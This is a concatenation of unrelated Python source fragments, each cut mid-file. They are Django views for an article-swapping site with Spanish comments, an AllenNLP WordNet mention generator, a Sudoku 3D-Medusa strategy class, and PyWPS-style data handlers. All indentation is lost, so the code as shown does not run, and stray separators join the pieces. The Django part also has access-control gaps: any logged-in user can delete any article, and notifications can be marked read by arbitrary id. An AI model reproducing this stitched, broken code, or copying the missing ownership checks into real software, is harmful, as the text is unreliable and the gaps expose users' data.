form = FormCreateUser()
context = {'form': form, 'messages': mensajes}
return render(request, 'register.html', context)
else:
return redirect('homepage')
@login_required(login_url='login')
def mis_notifications(request):
notifications = Notification.objects.all().filter(user = request.user).filter(is_readed = False)
content = {}
sender = []
for notification in notifications:
content = {
'notif': notification.context,
'notif_id': notification.id,
'link': notification.link
}
sender.append(content)
return render(request, 'notifications.html', {'notifications': sender})
@login_required(login_url='login') #Pide el logeo de un usuario para poder ingresar a una pagina en espesifico
def mis_articulos(request):
articles = Article.objects.all().filter(user = request.user)
content = {}
sender = []
for article in articles:
content = {
'title': article.title,
'date_created': article.date_created,
'link': '/articulo/' + str(article.id),
'edit_article': '/articulo/edit/' + str(article.id),
'image': article.image_one.url,
}
sender.append(content)
return render(request, 'mis_articulos.html', {'articles': sender})
@login_required(login_url='login')
def edit_article(request, id):
article = get_object_or_404(Article, id=id)
form = FormCreateArticle(request.POST, request.FILES or None, instance=article)
parent_categories = Category.objects.filter(parent=None).values()
child_categories = Category.objects.filter(parent=article.category.parent).values()
if request.user == article.user:
if form.is_valid():
form.save()
return redirect('mis_articulos')
return render(request, 'edit_articulo.html', {'article': article, 'parent_categories': parent_categories, 'child_categories': child_categories})
else:
return redirect('homepage')
@login_required(login_url='login')
def delete_article(request, id):
article = get_object_or_404(Article, id = id)
article.delete()
return redirect('homepage')
@login_required()
def cargar_articulo(request):
mensajes = []
if request.method == "POST":
form = FormCreateArticle(request.POST, request.FILES)
if form.is_valid():
new_article = form.save(commit=False)
new_article.user = request.user
new_article.save()
return redirect('mis_articulos')
else:
form = FormCreateArticle()
context = {'form': form, 'messages': mensajes}
return render(request, 'cargar_articulo.html', context)
@login_required(login_url='homepage') #Pide el logeo de un usuario para poder ingresar a una pagina en espesifico
def logout(request):
auth.logout(request)
return redirect("homepage")
def article(request, id):
article = Article.objects.get(pk=id)
comments = Comment.objects.filter(article=article.id)
if article:
return render(request, 'single-product.html', {'article': article, 'comments': comments})
else:
pass
def get_category(request, id):
if request.method == "GET":
categories = Category.objects.all()
if id == '0':
categories = categories.filter(parent=None).values()
else:
categories = categories.filter(parent=id).values()
categories_list = list(categories)
return JsonResponse(categories_list, safe=False)
pass
def get_articles_by_category(request, id):
if request.method == "GET":
articles = Article.objects.filter(category=id)
content = {}
sender = []
for article in articles:
content = {
'title': article.title,
'date_created': article.date_created,
'link': '/articulo/' + str(article.id),
'edit_article': '/articulo/edit/' + str(article.id),
'image': article.image_one.url,
'category': article.category.title,
'user': str(article.user),
}
sender.append(content)
return JsonResponse(sender, safe=False)
pass
@login_required(login_url='login')
def comment(request, id):
if request.method == 'POST':
article = Article.objects.get(pk=id)
comment = request.POST['comment']
if len(comment) < 254:
Comment.objects.create(
comment=comment,
user=request.user,
article=article,
)
return redirect('detalle_articulo', id)
@login_required(login_url='login') #Pide el logeo de un usuario para poder ingresar a una pagina en espesifico
def iniciar_canje(request, id_article):
if request.method == 'POST':
articles = request.POST.getlist('articles')
own_articles = request.POST.getlist('own_articles')
comment = request.POST['comment']
if len(comment) < 254:
new_canje = Canje()
new_canje.save()
article_id = 0
for article in articles:
article_id = article.split(' - ')[0]
new_canje.articles_assignee.add(article_id)
user_assignee = Article.objects.get(pk=article_id).user
for article in own_articles:
article_id = article.split(' - ')[0]
new_canje.articles_creator.add(article_id)
new_canje.comment = comment
new_canje.user_creator = request.user
new_canje.user_assignee = user_assignee
new_canje.notification = Notification.objects.create(
user = user_assignee,
is_readed = False,
context = f"Tienes un canje pendiente de {request.user}. ¿Deseas aceptarlo?",
link = f'/canjes/{new_canje.id}'
)
new_canje.save()
return mis_canjes(request)
else:
if id_article == '0':
return redirect('mis_canjes')
else:
article_user = Article.objects.get(pk=id_article).user
articles = Article.objects.filter(user=article_user)
own_articles = Article.objects.filter(user=request.user)
return render(request, 'iniciar_canje.html', {'articles': articles, 'own_articles': own_articles, 'user': article_user})
return redirect('homepage')
@login_required(login_url='login')
def ver_canje(request, id):
if request.method == "GET":
canje = Canje.objects.get(pk=id)
user_creator = canje.user_creator
user_assignee = canje.user_assignee
if request.user != user_creator and request.user != user_assignee:
return redirect('homepage')
else:
art_creator = []
context = {}
for articles_creator in canje.articles_creator.all():
context = {
'title': articles_creator.title,
'link': '/articulo/' + str(articles_creator.id),
'category': articles_creator.category.title
}
art_creator.append(context)
context = {}
art_assignee = []
for articles_assignee in canje.articles_assignee.all():
context = {
'title': articles_assignee.title,
'link': '/articulo/' + str(articles_assignee.id),
'category': articles_assignee.category.title
}
art_assignee.append(context)
return render(request, 'canjes.html', {'art_creator': art_creator, 'art_assignee': art_assignee, 'user_creator': user_creator, 'user_assignee': user_assignee, 'id': id})
elif request.method == "POST":
canje = Canje.objects.get(pk=id)
Notification.objects.filter(pk=canje.notification.id).update(is_readed=True)
if request.POST.get('acept_button'):
message = Message.objects.create(
sender = request.user,
content = "Hola! Acepte el canje!"
)
chat = Chat.objects.create(
participant1 = request.user,
participant2 = canje.user_creator,
)
chat.messages.set([message])
chat.save()
canje = Canje.objects.all().filter(pk=id)
canje.update(state=1)
return redirect('chats')
else:
canje = Canje.objects.all().filter(pk=id)
canje.update(state=2)
return redirect('homepage')
@login_required(login_url='login') #Pide el logeo de un usuario para poder ingresar a una pagina en especifico
def mis_canjes(request):
canjes = Canje.objects.all().filter(user_creator = request.user)
content = {}
sender = []
for canje in canjes:
content = {
'title1': canje.state,
'title2': canje.user_assignee,
'title3': canje.date_created,
'title4': canje.id
}
sender.append(content)
return render(request, 'mis_canjes.html', {'canjes': sender})
def categories(request):
categories = Category.objects.exclude(parent=None)
articles = Article.objects.order_by("-date_created")[:9]
content = {}
sender = []
for article in articles:
content = {
'title': article.title,
'date_created': article.date_created,
'link': '/articulo/' + str(article.id),
'edit_article': '/articulo/edit/' + str(article.id),
'image': article.image_one.url,
'category': article.category.title,
'user': str(article.user),
}
sender.append(content)
return render(request, 'categories.html', {'categories': categories, 'articles': sender})
def notifications(request, id):
if request.method == "GET" and request.user.is_authenticated == True:
if id == '0':
notifications = Notification.objects.filter(user=request.user).filter(is_readed=False)
notifications_list = []
content = {}
for notification in notifications:
content = {
'notif': notification.context,
'notif_id': notification.id,
}
notifications_list.append(content)
return JsonResponse({'notifications': notifications_list, 'count': len(notifications_list)}, safe=False)
else:
Notification.objects.filter(pk=id).update(is_readed=True)
return JsonResponse({'notifications': list([]), 'count': 0}, safe=False)
def get_images(request, id):
photos = []
if request.method == "GET":
article = Article.objects.get(pk=id)
if article.image_one:
photos.append(article.image_one.url)
if article.image_two:
photos.append(article.image_two.url)
if article.image_three:
photos.append(article.image_three.url)
if article.image_four:
photos.append(article.image_four.url)
if article.image_five:
photos.append(article.image_five.url)
return JsonResponse({'photos': photos}, safe=False)
class verificationview(View):
def get(self, request, uidb64, token):
try:
id = force_text(urlsafe_base64_decode(uidb64))
user = User.objects.get(pk=id)
if not token_generator.check_token(user, token):
return redirect('login')
if user.is_active:
return redirect('homepage')
user.is_active = True
user.save()
messages.success(request, 'Usuario activado con Éxito')
return redirect('login')
except Exception as ex:
pass
return redirect('login')
def robots_txt(request): #El robot.txt
return render(request, "robots.txt", {})
@login_required(login_url='login') #Pide el logeo de un usuario para poder ingresar a una pagina en especifico
def chats(request):
chats = Chat.objects.all().filter(Q(participant1=request.user) | Q(participant2=request.user))
context = {}
sender = []
flag = True
first_messages = []
first_chat_id = []
for chat in chats:
if flag:
flag = False
first_messages = chat.messages.all().order_by('timestamp')
first_chat_id = chat.id
all_messages = chat.messages.all()
last_message = all_messages.order_by('-timestamp')[0]
user = None
if request.user == chat.participant1:
user = chat.participant2
else:
user = chat.participant1
context = {
'time': last_message.timestamp,
'user': user,
'content': last_message.content,
'chat_id': chat.id
}
sender.append(context)
return render(request, "chat.html", {'context': sender, 'messages': first_messages, 'first_chat_id': first_chat_id})
def chat(request, | |
"""
Notes on wordnet ids:
in KG embeddings, have both synset and lemma nodes:
synsets are keyed by something like able.a.01register("wordnet_mention_generator")
each synset has a number of lemmas, keyed by something like able%3:00:00::
In WSD task, you are given (lemma, pos) and asked to predict the lemma
key, e.g. (able, adj) -> which synset do we get?
Internally, we use the able.a.01 key for synsets, but maintain a map
from (lemma, pos, internal key) -> external key for evaluation with semcor.
"""
import torch
import random
from typing import List, Dict
from allennlp.data import DatasetReader, Token, Vocabulary, Tokenizer
from allennlp.data.token_indexers import SingleIdTokenIndexer, TokenIndexer, TokenCharactersIndexer
from allennlp.data.fields import Field, TextField, ListField, SpanField, ArrayField, MetadataField
from allennlp.data.instance import Instance
from allennlp.models import Model
from allennlp.common.file_utils import cached_path
from nltk.corpus import wordnet as wn
from nltk.stem import PorterStemmer
from collections import defaultdict
from kb.common import JsonFile, get_empty_candidates
from kb.kg_embedding import KGTuplePredictor
from kb.entity_linking import EntityLinkingReader
from kb.common import WhitespaceTokenizer, MentionGenerator, init_bert_weights, EntityEmbedder
from pytorch_pretrained_bert.modeling import BertLayerNorm
import numpy as np
import h5py
import spacy
from spacy.tokens import Doc
class WordNetSpacyPreprocessor:
"""
A "preprocessor" that really does POS tagging and lemmatization using spacy,
plus some hand crafted rules.
allennlp tokenizers take strings and return lists of Token classes.
we'll run spacy first, then modify the POS / lemmas as needed, then
return a new list of Token
"""
def __init__(self, whitespace_tokenize_only: bool = False):
self.nlp = spacy.load('en_core_web_sm', disable=['tagger', 'parser', 'ner', 'textcat'])
if whitespace_tokenize_only:
self.nlp.tokenizer = WhitespaceTokenizer(self.nlp.vocab)
# spacy POS are similar, but not exactly the same as wordnet,
# so need this conversion for tags that need to be mapped
self.spacy_to_wordnet_map = {
'PROPN': 'NOUN'
}
def __call__(self, text: str) -> List[Token]:
spacy_doc = self.nlp(text)
# create allennlp tokens
normalized_tokens = [
Token(spacy_token.text,
pos_=self.spacy_to_wordnet_map.get(spacy_token.pos_, spacy_token.pos_),
lemma_=spacy_token.lemma_
)
for spacy_token in spacy_doc
if not spacy_token.is_space
]
return normalized_tokens
def _norm_lemma(lemma_str):
return lemma_str.replace('_', ' ').replace('-', ' ')
WORDNET_TO_SEMCOR_POS_MAP = {
'n': 'NOUN', # %1
'v': 'VERB', # %2
'a': 'ADJ', # %3
'r': 'ADV', # %4
's': 'ADJ', # %5
}
def load_candidate_maps(fname, topk=30, count_smoothing=1):
"""
Load the candidate maps from the entity file.
entity_file is the jsonl dump from extract_wordnet.py
returns:
candidates[Dict[normalized lemma string] -> candidates
lemma_id_to_synset_id = Dict["able%3:00:00"] -> "able.a.01"
each value candidates list is:
[candidate1_metadata, candidate2_metadata, etc]
where candidate_metadata is a dict with keys:
synset_id, lemma_id, pos (n, v, a, ), prior
The lemmas are underscore and hyphen normalized for training.
topk = keep this many of the top candidates for each lemma
count_smoothing = use this for smoothing
if count_smoothing < 0 then don't normalize lemmas, just return raw counts
"""
def _update(d, key, m):
if key not in d:
d[key] = []
d[key].append(m)
def _trim_and_normalize(d, num, smoothing):
for key in d:
all_candidates = d[key]
if len(all_candidates) > num:
# sort by count and trim
# sorted sorts ascending by default, we want decending by count
sorted_candidates = sorted(all_candidates, key=lambda x: x['prior'], reverse=True)
trimmed_candidates = sorted_candidates[:num]
else:
trimmed_candidates = all_candidates
if smoothing >= 0:
sum_count = sum(ele['prior'] + smoothing for ele in trimmed_candidates)
for cand in trimmed_candidates:
cand['prior'] = (cand['prior'] + smoothing) / sum_count
d[key] = trimmed_candidates
candidates = {}
lemma_id_to_synset_id = {}
with JsonFile(cached_path(fname), 'r') as fin:
for entity in fin:
if entity['type'] == 'lemma':
lemma_id = entity['id']
lemma_str = lemma_id.partition('%')[0]
synset_id = entity['synset']
metadata = {'synset_id': synset_id,
'lemma_id': lemma_id,
'pos': entity['pos'],
'prior': entity['count']}
# normalize the lemma_str
lemma_str_normalized = _norm_lemma(lemma_str)
_update(candidates, lemma_str_normalized, metadata)
lemma_id_to_synset_id[lemma_id] = synset_id
# now trim to top k and normalize the prior
_trim_and_normalize(candidates, topk, count_smoothing)
return candidates, lemma_id_to_synset_id
# Unsupervised setting for LM:
# raw data -> use spacy to get lemma -> look up all candidates normalizing
# - and _
#
# With annotated data:
# at train time:
# given gold spans and entity ids:
# map semcor tokens to flat token sequence + gold ids + gold spans
# look up all candidate spans using raw data approach ignoring POS and lemma
# remove generic entity types
# restrict candidate spans to just those that have annotated senses
# compute the recall of gold span / entity from pruned candidate lsit (for MWE separate from single words)
#
# at test time:
# given gold POS and lemma, get candidates.
# for generic entity types, use heuristic to restrict candidates
# should have near 100% recall of gold span
# and first sense baseline should be high
def _update_candidate_list(c, s, e, p):
c['candidate_spans'].append(s)
c['candidate_entities'].append(e)
c['candidate_entity_priors'].append(p)
@MentionGenerator.register("wordnet_mention_generator")
class WordNetCandidateMentionGenerator(MentionGenerator):
"""
Generate lists of candidate entities. Provides several methods that
process input text of various format to produce mentions.
Each text is represented by:
{'tokenized_text': List[str],
'candidate_spans': List[List[int]] list of (start, end) indices for candidates,
where span is tokenized_text[start:(end + 1)]
'candidate_entities': List[List[str]] = for each entity,
the candidates to link to. value is synset id, e.g
able.a.02 or hot_dog.n.01
'candidate_entity_priors': List[List[float]]
}
"""
def __init__(
self,
entity_file: str,
max_entity_length: int = 7,
max_number_candidates: int = 30,
count_smoothing: int = 1,
use_surface_form: bool = False,
random_candidates: bool = False):
self._raw_data_processor = WordNetSpacyPreprocessor()
self._raw_data_processor_whitespace = WordNetSpacyPreprocessor(
whitespace_tokenize_only=True
)
self._candidate_list, self._lemma_to_synset = load_candidate_maps(
entity_file, count_smoothing=-1
)
# candidate_list[hog dog] -> [all candidate lemmas]
self._entity_synsets = {
#'location%1:03:00::': 'location.n.01', # (LOC)
#'person%1:03:00::': 'person.n.01', # (PER)
#'group%1:03:00::': 'group.n.01' # (ORG)
'location': 'location.n.01', # (LOC)
'person': 'person.n.01', # (PER)
'group': 'group.n.01' # (ORG)
}
self._entity_lemmas = {
'location%1:03:00::',
'person%1:03:00::',
'group%1:03:00::',
}
self._max_entity_length = max_entity_length
self._max_number_candidates = max_number_candidates
self._count_smoothing = count_smoothing
self._use_surface_form = use_surface_form
self._random_candidates = random_candidates
if self._random_candidates:
self._unique_synsets = list(set(self._lemma_to_synset.values()))
def get_mentions_with_gold_spans(
self, gold_annotations
):
"""
use for training with semcor -- it will use the full unrestricted
generator, but restrict to just the gold annotation spans, without
using the gold lemma or POS.
remove generic entity types (PER, LOC, ORG)
restrict candidate spans to just those that have annotated senses
"""
tokenized_text = gold_annotations['tokenized_text']
text = ' '.join(gold_annotations['tokenized_text'])
candidates = self.get_mentions_raw_text(text, whitespace_tokenize=True,
allow_empty_candidates=True)
# each gold annotation needs to be in output
# will look up candidates by (start, end) indices so remap candidates
candidates_by_endpoints = {
tuple(start_end): {'entities': ent, 'priors': pri}
for start_end, ent, pri in zip(
candidates['candidate_spans'],
candidates['candidate_entities'],
candidates['candidate_entity_priors']
)
}
filtered_candidates = {
'tokenized_text': tokenized_text,
'candidate_spans': [],
'candidate_entities': [],
'candidate_entity_priors': []
}
for k in range(len(gold_annotations['gold_spans'])):
span = gold_annotations['gold_spans'][k]
lemma = gold_annotations['gold_lemmas'][k]
pos = gold_annotations['gold_pos'][k]
lemma_id = gold_annotations['gold_lemma_ids'][k]
if lemma_id in self._entity_lemmas:
# skip
continue
span_candidates = candidates_by_endpoints.get(tuple(span))
if span_candidates is None:
# this one wasn't found by candidate generation
continue
# add to the list
_update_candidate_list(filtered_candidates, span,
span_candidates['entities'],
span_candidates['priors'])
return filtered_candidates
def get_mentions_from_gold_span_lemma_pos(
self, gold_annotations
):
"""
apply heuristic for generic entity types
restrict candidate spans to just those that have
annotated senses
use the gold lemma and POS to further restrict entity types
gold_annotations is output from unpack_wsd_training_instance, has keys
{'tokenized_text': tokenized_text,
'gold_spans': gold_spans,
'gold_entities': gold_entities,
'gold_lemmas': gold_lemmas,
'gold_pos': gold_pos,
'gold_ids': gold_ids}
"""
# each gold annotation needs to be in output
# need one output for each gold span
tokenized_text = gold_annotations['tokenized_text']
candidates = {'tokenized_text': tokenized_text,
'candidate_spans': [],
'candidate_entities': [],
'candidate_entity_priors': []}
tokenized_text = gold_annotations['tokenized_text']
for k in range(len(gold_annotations['gold_spans'])):
span = gold_annotations['gold_spans'][k]
lemma = gold_annotations['gold_lemmas'][k]
pos = gold_annotations['gold_pos'][k]
# check for named entities
if pos == 'NOUN' and lemma in self._entity_synsets:
if lemma != tokenized_text[span[0]]:
# hack, assume it's the generic entity type
candidate_ids = [self._entity_synsets[lemma]]
candidate_priors = [1.0]
_update_candidate_list(
candidates, span, candidate_ids, candidate_priors
)
continue
# look up by (lemma, pos)
normalized_lemma = _norm_lemma(lemma)
all_candidates = self._candidate_list[normalized_lemma]
# restrict to pos
cand_entities = []
cand_priors = []
for cand in all_candidates:
if WORDNET_TO_SEMCOR_POS_MAP[cand['pos']] == pos:
cand_entities.append(cand['synset_id'])
cand_priors.append(cand['prior'])
# renormalize prior
sum_prior = sum(cand_priors) + len(cand_priors) * self._count_smoothing
norm_prior = [(p + self._count_smoothing) / sum_prior for p in cand_priors]
_update_candidate_list(candidates, span, cand_entities, norm_prior)
return candidates
def get_mentions_raw_text(
self,
text: str,
whitespace_tokenize: bool = False,
allow_empty_candidates: bool = False,
):
"""
returns:
{'tokenized_text': List[str],
'candidate_spans': List[List[int]] list of (start, end) indices for candidates,
where span is tokenized_text[start:(end + 1)]
'candidate_entities': List[List[str]] = for each entity,
the candidates to link to. value is synset id, e.g
able.a.02 or hot_dog.n.01
'candidate_entity_priors': List[List[float]]
}
"""
if whitespace_tokenize:
tokenized = self._raw_data_processor_whitespace(text)
else:
tokenized = | |
<reponame>sok63/sudoku-1
#
# Medusa based strategy module
#
import itertools
from logger import *
from playbook import *
from sudoku import *
class MedusaBase(Strategy):
def __init__(self, name, simple = True):
Strategy.__init__(self, name)
self.simple = simple
"""
Return the set of links in the graph optionally conditioned upon
hint and color matching. Each link takes the form of a 2-tuple
with node and hint.
"""
def medusa_all_links(self, graph, hint = None, color = None):
return set([l for l, c in graph.keys()
if (hint is None or l[1] == hint) and
(color is None or c == color)])
"""
Return True if the link is in the graph.
"""
def medusa_has_link(self, graph, link):
for color in [True, False]:
if (link, color) in graph:
return True
return False
"""
Return the set of all Sudoku nodes in the 3D-MEDUSA graph.
"""
def medusa_all_nodes(self, graph, hint = None, color = None):
return set([n for n, h in self.medusa_all_links(graph, hint, color)])
"""
Return the set of all hints in the 3D-MEDUSA graph. For simple
coloring, there will be one and only.
"""
def medusa_all_hints(self, graph, color = None):
return set([h for n, h in self.medusa_all_links(graph, None, color)])
"""
Return the set of hints in the 3D-MEDUSA graph in the given
node and with the given color.
"""
def medusa_node_hints(self, graph, node, color = None):
return set([h for x, h in self.medusa_all_links(graph, None, color) if x == node])
"""
Return the raw "chain" as a list of locations and the connected
locations for each.
"""
def medusa_chain(self, graph):
return graph.items()
"""
Format the medusa graph for printing.
"""
def medusa_format(self, graph):
return ", ".join("{0}[{1}]".format(
self.medusa_format_loc(k),
"|".join(self.medusa_format_loc(l) for l in v))
for k, v in graph.items())
"""
Format a single medusa graph node for printing.
"""
def medusa_format_loc(self, loc):
(n, h), c = loc
return "{0}{1}[{2}]".format("+" if c else "-", h, n)
"""
Purge all hints in the 3D-MEDUSA graph with the given color.
This should always return True since a 3D-MEDUSA graph should
have hints of both colors.
"""
def medusa_purge_color(self, plan, graph, color, reason, note):
status = False
for node in self.medusa_all_nodes(graph):
hints = self.medusa_node_hints(graph, node, color)
if self.purge_hints(plan, [node], hints, reason, note):
status = True
return status
"""
If two hints in a node have the same color, all hints of that
color can be removed from the graph.
"""
def medusa_conflict_node(self, plan, graph, reason):
for node in self.medusa_all_nodes(graph):
if node.is_complete():
continue
for color in [True, False]:
hints = self.medusa_node_hints(graph, node, color)
if len(hints) > 1:
note = "hints {0} have color {1} in {2}".format(
sorted(hints), color, node)
return self.medusa_purge_color(plan, graph, color, reason, note)
return False
"""
It the same hint appears twice in the same color in the same lot,
all hints of that color can be removed from the graph.
"""
def medusa_conflict_lot(self, plan, graph, reason):
nodes = self.medusa_all_nodes(graph)
for lot in plan.get_sudoku().get_lots():
lnodes = nodes & set(lot.get_nodes())
for color in [True, False]:
conflicts = set()
candidates = [self.medusa_node_hints(graph, node, color) for node in lnodes
if not node.is_complete()]
for pair in itertools.combinations(candidates, 2):
conflicts |= pair[0] & pair[1]
if conflicts:
note = "hints {0} have color {1} in {2}".format(
sorted(conflicts), color, lot)
return self.medusa_purge_color(plan, graph, color, reason, note)
return False
"""
Check if a node in the 3D-MEDUSA graph has two conflicting colors.
"""
def medusa_bicolor_node(self, plan, graph, reason):
status = False
for node in self.medusa_all_nodes(graph):
if node.is_complete():
continue
on = self.medusa_node_hints(graph, node, True)
off = self.medusa_node_hints(graph, node, False)
if not on or not off:
continue
hints = on | off
if self.test_update([node], hints):
self.update_hints(plan, [node], hints, reason, "dual-color node")
status = True
return status
"""
Check if a node outside of the 3D-MEDUSA graph can simultaneously
"see" nodes of conflicting colors.
"""
def medusa_conflict_offchain(self, plan, graph, reason):
status = False
for hint in self.medusa_all_hints(graph):
on = self.find_related(self.medusa_all_nodes(graph, hint, True))
off = self.find_related(self.medusa_all_nodes(graph, hint, False))
intersect = on & off
hints = set([hint])
if self.test_purge(intersect, hints):
self.purge_hints(plan, intersect, hints, reason, "off-chain color conflict")
status = True
return status
"""
If an uncolored hint in a node can see the same hint but colored in
the lot, and any hint exists in the same node with opposite color,
we can remove the uncolored hint.
"""
def medusa_node_lot(self, plan, graph, reason):
status = False
nodes = self.medusa_all_nodes(graph)
for node in nodes:
if node.is_complete():
continue
hints = node.get_hints()
for color in [True, False]:
hints -= self.medusa_node_hints(graph, node, color)
area = node.find_related()
conflicts = set()
for hint in hints:
for color in [True, False]:
if not self.medusa_node_hints(graph, node, color):
continue
intersect = area & self.medusa_all_nodes(graph, hint, not color)
if intersect:
conflicts.add(hint)
if self.test_purge([node], conflicts):
self.purge_hints(plan, [node], conflicts, reason, "node lot conflict")
status = True
return status
"""
Check if a node outside of the 3D-MEDUSA graph is emptied by
nodes of the same color.
"""
def medusa_empty_color(self, plan, graph, reason):
nodes = set(plan.get_sudoku().get_incomplete()) - self.medusa_all_nodes(graph)
for node in nodes:
for color in [True, False]:
status = True
for hint in node.get_hints():
intersect = self.medusa_all_nodes(graph, hint, color) & node.find_related()
if not intersect:
status = False
break
if status:
note = "{0} emptied by color {1}".format(node, color)
return self.medusa_purge_color(plan, graph, color, reason, note)
return False
"""
Process a 3D-MEDUSA graph.
"""
def medusa_process(self, plan, graph):
reason = {"chain": self.medusa_format(graph),
"__chain__": self.medusa_chain(graph)}
status = False
if not self.simple and self.medusa_conflict_node(plan, graph, reason):
status = True
if self.medusa_conflict_lot(plan, graph, reason):
status = True
if not self.simple and self.medusa_bicolor_node(plan, graph, reason):
status = True
if self.medusa_conflict_offchain(plan, graph, reason):
status = True
if self.medusa_node_lot(plan, graph, reason):
status = True
if not self.simple and self.medusa_empty_color(plan, graph, reason):
status = True
return status
"""
Return all exclusive links emanating from the given link.
"""
def medusa_find_links(self, link):
node, hint = link
# Look for exclusive links in each lot.
nodes = [lot.exclusive_link(node, hint) for lot in node.get_lots()]
nodes = set([n for n in nodes if n])
links = set([(n, hint) for n in nodes])
# Look for exclusive link in the node.
if not self.simple:
diff = node.get_hints() - set([hint])
if len(diff) == 1:
sibling = diff.pop()
links.add((node, sibling))
return links
"""
Add the next location to the graph and return True if it didn't
exist in the graph before. Meanwhile, make a connection from the
current location to the next if and only if we didn't come from
there.
"""
def medusa_add(self, graph, next, loc = None):
status = not next in graph
if status:
graph[next] = []
if loc and not loc in graph[next]:
graph[loc].append(next)
return status
"""
Recursive 3D-MEDUSA graph walk. It takes the partially constructed
graph and a location in the graph and enters all edges emanating
from that location into the graph. It calls itself if there are any
new location to be explored. Otherwise, the recursion terminates.
"""
def medusa_walk(self, loc, graph):
link, color = loc
# Add the origin to the graph.
if not graph:
self.medusa_add(graph, loc)
locs = []
links = self.medusa_find_links(link)
for next in [(l, not color) for l in links]:
if self.medusa_add(graph, next, loc):
locs.append(next)
for next in locs:
self.medusa_walk(next, graph)
"""
Each 3D-MEDUSA instance is a graph. The node in the graph, referred
to as location henceforth to not confuse with the Sudoku node, is a
2-tuple of a link and its binary color. The link is a 2-tuple by
itself of Sudoku node and hint. An edge may connect two locations
which indicates the existence of an exclusive (or strong) link
between the two links. The color of the link in a 3D-MEDUSA graph
always alternates between any pair of connected links. We use a dict
to represent the 3D-MEDUSA graph.
The 3D-MEDUSA instance is an undirected, fully reachable, and possibly
cyclic graph. That implies we will eventually cover the entire graph
regardless where we start.
A Sudoku instance may have multiple 3D-MEDUSA instances, each of which
is represented | |
of the data."""
if not PY2 and isinstance(self.data, bytes):
return BytesIO(self.data)
else:
return StringIO(text_type(self.data))
class StreamHandler(DataHandler):
prop = 'stream'
@property
def stream(self):
"""Return the stream."""
return self._stream
@stream.setter
def stream(self, value):
"""Set the stream."""
self._reset_cache()
self._stream = value
self._check_valid()
@property
def data(self):
"""Return the data from the stream."""
if self._data is None:
self._data = self.stream.read()
return self._data
class UrlHandler(FileHandler):
prop = 'url'
@property
def url(self):
"""Return the URL."""
return self._url
@url.setter
def url(self, value):
"""Set the URL value."""
self._reset_cache()
self._url = value
self._check_valid()
@property
def file(self):
if self._file is not None:
return self._file
self._file = self._build_file_name(href=self.url)
max_byte_size = self.max_input_size()
# Create request
try:
reference_file = self._openurl(self.url, self.post_data)
data_size = reference_file.headers.get('Content-Length', 0)
except Exception as e:
raise NoApplicableCode('File reference error: {}'.format(e))
error_message = 'File size for input "{}" exceeded. Maximum allowed: {} megabytes'.format(
self.inpt.get('identifier', '?'), max_byte_size)
if int(data_size) > int(max_byte_size):
raise FileSizeExceeded(error_message)
try:
with open(self._file, 'wb') as f:
data_size = 0
for chunk in reference_file.iter_content(chunk_size=1024):
data_size += len(chunk)
if int(data_size) > int(max_byte_size):
raise FileSizeExceeded(error_message)
f.write(chunk)
except Exception as e:
raise NoApplicableCode(e)
return self._file
@property
def post_data(self):
return self._post_data
@post_data.setter
def post_data(self, value):
self._post_data = value
@staticmethod
def _openurl(href, data=None):
"""Open given href.
"""
LOGGER.debug('Fetching URL {}'.format(href))
if data is not None:
req = requests.post(url=href, data=data, stream=True)
else:
req = requests.get(url=href, stream=True)
return req
@staticmethod
def max_input_size():
"""Calculates maximal size for input file based on configuration
and units.
:return: maximum file size in bytes
"""
ms = config.get_config_value('server', 'maxsingleinputsize')
return config.get_size_mb(ms) * 1024**2
class SimpleHandler(DataHandler):
"""Data handler for Literal In- and Outputs
>>> class Int_type(object):
... @staticmethod
... def convert(value): return int(value)
>>>
>>> class MyValidator(object):
... @staticmethod
... def validate(inpt): return 0 < inpt.data < 3
>>>
>>> inpt = SimpleHandler(data_type = Int_type)
>>> inpt.validator = MyValidator
>>>
>>> inpt.data = 1
>>> inpt.validator.validate(inpt)
True
>>> inpt.data = 5
>>> inpt.validator.validate(inpt)
False
"""
def __init__(self, workdir=None, data_type=None, mode=MODE.NONE):
DataHandler.__init__(self, workdir=workdir, mode=mode)
if data_type not in LITERAL_DATA_TYPES:
raise ValueError('data_type {} not in {}'.format(data_type, LITERAL_DATA_TYPES))
self.data_type = data_type
@DataHandler.data.setter
def data(self, value):
"""Set data value. Inputs are converted into target format.
"""
if self.data_type and value is not None:
value = convert(self.data_type, value)
DataHandler.data.fset(self, value)
class BasicIO:
"""Basic Input/Output class
"""
def __init__(self, identifier, title=None, abstract=None, keywords=None,
min_occurs=1, max_occurs=1, metadata=[]):
self.identifier = identifier
self.title = title
self.abstract = abstract
self.keywords = keywords
self.min_occurs = int(min_occurs)
self.max_occurs = int(max_occurs)
self.metadata = metadata
class BasicLiteral:
"""Basic literal Input/Output class
"""
def __init__(self, data_type="integer", uoms=None):
assert data_type in LITERAL_DATA_TYPES
self.data_type = data_type
# list of uoms
self.uoms = []
# current uom
self._uom = None
# add all uoms (upcasting to UOM)
if uoms is not None:
for uom in uoms:
if not isinstance(uom, UOM):
uom = UOM(uom)
self.uoms.append(uom)
if self.uoms:
# default/current uom
self.uom = self.uoms[0]
@property
def uom(self):
return self._uom
@uom.setter
def uom(self, uom):
if uom is not None:
self._uom = uom
class BasicComplex(object):
"""Basic complex input/output class
"""
def __init__(self, data_format=None, supported_formats=None):
self._data_format = data_format
self._supported_formats = ()
if supported_formats:
self.supported_formats = supported_formats
if data_format:
self.data_format = data_format
elif self.supported_formats:
# not an empty list, set the default/current format to the first
self.data_format = supported_formats[0]
def get_format(self, mime_type):
"""
:param mime_type: given mimetype
:return: Format
"""
for frmt in self.supported_formats:
if frmt.mime_type == mime_type:
return frmt
else:
return None
@property
def validator(self):
"""Return the proper validator for given data_format
"""
return self.data_format.validate
@property
def supported_formats(self):
return self._supported_formats
@supported_formats.setter
def supported_formats(self, supported_formats):
"""Setter of supported formats
"""
def set_format_validator(supported_format):
if not supported_format.validate or \
supported_format.validate == emptyvalidator:
supported_format.validate =\
get_validator(supported_format.mime_type)
return supported_format
self._supported_formats = tuple(map(set_format_validator, supported_formats))
@property
def data_format(self):
return self._data_format
@data_format.setter
def data_format(self, data_format):
"""self data_format setter
"""
if self._is_supported(data_format):
self._data_format = data_format
if not data_format.validate or data_format.validate == emptyvalidator:
data_format.validate = get_validator(data_format.mime_type)
else:
raise InvalidParameterValue("Requested format {}, {}, {} not supported".format(
data_format.mime_type,
data_format.encoding,
data_format.schema),
'mimeType')
def _is_supported(self, data_format):
if self.supported_formats:
for frmt in self.supported_formats:
if frmt.same_as(data_format):
return True
return False
class BasicBoundingBox(object):
"""Basic BoundingBox input/output class
"""
def __init__(self, crss=None, dimensions=2):
self.crss = crss or ['epsg:4326']
